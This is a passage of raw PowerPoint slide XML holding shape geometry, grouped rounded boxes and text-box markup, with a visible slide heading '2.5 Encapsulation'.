                    <a:pt x="26749" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431162" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14311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F0598BC3-2F34-A07D-D773-ABC8B79A9DEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6933437" y="2268474"/>
              <a:ext cx="1522730" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1522729" h="913130">
                  <a:moveTo>
                    <a:pt x="0" y="91312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7177" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431162" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431162" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312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5" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{436C543D-D944-D7CF-D2AB-2F5E58CFC775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7281887" y="2512556"/>
            <a:ext cx="10706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B16F8BF8-998D-7057-A551-1C51BD7895C7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C4C51344-0FCE-EF58-0429-D50FAF96FB26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40</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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69F510-2C23-0202-825F-47CDEB07059B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="614520" y="1533600"/>
              <a:ext cx="8053560" cy="162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69F510-2C23-0202-825F-47CDEB0705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160" y="1524240"/>
                <a:ext cx="8072280" cy="16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8A02A2-7BAB-45D9-B288-B9E955A244D6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2690640" y="1390680"/>
              <a:ext cx="3834360" cy="2034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8A02A2-7BAB-45D9-B288-B9E955A244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1280" y="1381320"/>
                <a:ext cx="3853080" cy="20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697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96E6BD4-BDBB-08C9-F419-F9B954DDD68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432714" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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F9FCADA4-20DD-019E-8E9B-12A0AA46EF79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA986EED-F5BB-A775-9E60-F9C79BE8BB06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7" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90A81998-F82C-B252-4047-860CAC6D635F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55055FB1-5848-B388-A7CC-F4BF2A479E84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="1181102"/>
            <a:ext cx="20078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D728F374-12B0-53BA-ACC5-EE9D5EAC940F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{905700E0-5EBE-43FA-BF98-6D2EF80735D2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00763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5" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B2DDCC-1F7D-B33E-24E2-6C8D7F449F53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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4303B2-343F-E56A-8562-91AA8CAB8D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D37197F9-CE50-BE06-8F9B-31A26F82BEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A29DBE8C-F0AB-EAD9-6D3E-C8B3456C009B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3" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85468DF4-77DC-141C-FAB8-7E66C623BB55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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3ECB33-C98B-73AF-465A-4B91D5E0D8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685ECC71-700B-EE70-5037-C77DC3015012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C27E95-C0CC-411E-C2FF-22DECCCA6492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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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1" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA331305-03A3-20F7-0469-3C03A73791F2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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749338D0-621F-9E9A-4FAC-4538EB363E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE841A44-7545-6FA3-4FA2-6D45F959C8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264503" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B461FD68-7480-3A2A-D191-B84E502A4278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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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9" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD1AAF5-3460-4C7A-B981-051A0655A64A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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D38F7C1-C935-DD2B-5BE4-6B0277AA8B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404077" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC165AE-D525-7425-FE7B-5815EAD335C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994499" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE042CA-3318-268E-BED9-AE4B5D53D788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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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7" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AABBBC-B2E0-ACC7-401A-165411785D7E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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E1D8B59-36AA-73B2-3EF6-87252BB5B093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136740" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2874DD8-F776-E18C-B5C8-70AB99B7D9B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5568035" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB54D1B-E699-F735-1EF7-AE937940C937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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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5" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829DFA78-34B2-6DD5-5E4D-1C60CEBDBDE8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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A7E2CF-C6B4-C0EE-2F14-205BFDC0B633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706339" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F014C7DC-00F4-76C3-F7C9-9DB848CC1BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6296508" y="2087679"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6275070" y="2157222"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6543743E-0B4C-7A1B-31AE-5CA6D2C72A90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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4">
                  <a:moveTo>
                    <a:pt x="1625346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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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3" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E4A05B-18C7-D65E-E92E-151198DEAA67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB8B6D4E-A96F-586D-EEFD-DB3B8120DA79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450940" y="2332027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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B9AB79-5E71-100A-7A9D-3AFE261E9338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4824323" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="4802885" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E674EB-4247-0051-2F20-2A68BB104249}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826389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1" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D18E64F-B3D8-92E4-327D-01AF8A92D471}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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9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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F4DE74-C8DD-405D-C130-90BD2616E6EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
